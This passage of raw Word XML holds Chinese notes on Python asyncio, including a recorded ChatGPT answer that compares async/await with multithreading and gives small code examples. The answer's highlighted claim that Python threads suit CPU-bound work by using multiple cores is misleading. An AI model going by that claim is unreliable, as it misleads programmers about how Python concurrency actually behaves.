        </w:rPr>
        <w:t xml:space="preserve">x </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>range</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>) ]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t>loop = asyncio.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>get_event_loop</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loop.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>run_until_complete</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(asyncio.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>wait</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(task_list))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622804F1" w14:textId="77777777" w:rsidR="004B0351" w:rsidRPr="002C6EFC" w:rsidRDefault="004B0351" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DA8D68D" w14:textId="77777777" w:rsidR="004B0351" w:rsidRDefault="004B0351" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F9B59EB" w14:textId="77777777" w:rsidR="004B0351" w:rsidRDefault="004B0351" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46AAD832" w14:textId="77777777" w:rsidR="004B0351" w:rsidRDefault="004B0351" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A9E393C" w14:textId="77777777" w:rsidR="004B0351" w:rsidRDefault="004B0351" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EE368A8" w14:textId="77777777" w:rsidR="004B0351" w:rsidRDefault="004B0351" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41BCC2C2" w14:textId="77777777" w:rsidR="007215D1" w:rsidRDefault="007215D1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A0430B6" w14:textId="20A92642" w:rsidR="00591CC8" w:rsidRDefault="00591CC8" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="537" w:name="_Toc159779974"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>hatGPT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>回答的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:bookmarkEnd w:id="537"/>
    </w:p>
    <w:p w14:paraId="4F409B4C" w14:textId="77777777" w:rsidR="008C3F34" w:rsidRDefault="008C3F34" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="586462B9" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRPr="00B63856" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B63856">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>我不懂</w:t>
      </w:r>
      <w:r w:rsidRPr="00B63856">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>async</w:t>
      </w:r>
      <w:r w:rsidRPr="00B63856">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00B63856">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r w:rsidRPr="00B63856">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00B63856">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>asyncio</w:t>
      </w:r>
      <w:r w:rsidRPr="00B63856">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>库的使用，告诉我他们的用法。</w:t>
      </w:r>
      <w:r w:rsidRPr="00B63856">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B63856">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>告诉我他们和多线程的区别，和使用场景的区别。给我多个案例让我理解。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2C4387" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00B63856">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2327503C" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="363DDE7F" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asyncio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的一个库，用于编写单线程并发代码。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asyncio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是基于协程的，它使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>async/await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语法。它的主要组成部分包括事件循环</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(Event Loop)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、协程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(Coroutine)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(Task)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、未来对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(Future)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、和其他并发并行运行任务的函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F54E11F" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C1BA236" w14:textId="2BF22B2B" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先来看一下如何使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4977856B" w14:textId="046ECAFF" w:rsidR="00A67E21" w:rsidRPr="00256F53" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义一个协程函数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094647DF" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def hello():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E7C95C" w14:textId="296E38DC" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print("Hello, asyncio!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B24B4B2" w14:textId="6B639CC0" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以用在协程函数内部，表达等待另一个操作完成的意思。通常情况下，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后面跟的是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>I/O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作、耗时操作或者其他协程函数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46572854" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18B303BF" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def hello():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A37913" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print("Start")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68689AB4" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    await asyncio.sleep(1)  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模拟耗时操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1003CC34" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print("End")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBD8E13" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F006F08" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asyncio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的事件循环来运行上述的协程函数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287E02B5" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="053AA9DB" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>asyncio.run(hello())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3692F0B4" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4628C336" w14:textId="04880773" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>多线程和</w:t>
      </w:r>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>asyncio</w:t>
      </w:r>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>的区别：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F9DEE3" w14:textId="71926ABD" w:rsidR="00A67E21" w:rsidRPr="00256F53" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多线程和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asyncio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都是实现并发的方式，但他们有明显的区别。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE87E02" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多线程是利用计算机多个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>核心实现真正的并行计算，每个线程都是独立的，有自己的上下文，切换需要花费一定的时间。而且，多线程编程中需要处理线程之间的通信问题，以及处理线程的同步和异步问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3700DE" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3829454D" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asyncio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现的是单线程的并发，其核心是事件循环。协程的运行由事件循环控制，一个任务运行一段时间后，可以主动放弃</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的执行权，切换到其他任务上，这样实现了在单线程内多任务的并发执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2254702B" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26842EF8" w14:textId="45C6C254" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用场景的区别：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095333A3" w14:textId="686D579B" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>多线程适合</w:t>
      </w:r>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>密集型任务，例如大量的计算，因为多线程可以利用多核。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F0A55E" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>而</w:t>
      </w:r>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>asyncio</w:t>
      </w:r>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>更适合</w:t>
      </w:r>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>密集型任务，如网络请求、文件读写等，因为这些任务的主要时间花在等待</w:t>
      </w:r>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>负载不高。使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>asyncio</w:t>
      </w:r>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>可以在等待时切换到其他任务，提高效率。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4604E6FB" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="451E113C" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>案例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8813C6" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F079D4E" w14:textId="7519F55E" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模拟多个网络请求的场景：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122ABF03" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRPr="00256F53" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import aiohttp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEE8B5E" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRPr="00256F53" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import asyncio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36654E3F" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRPr="00256F53" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
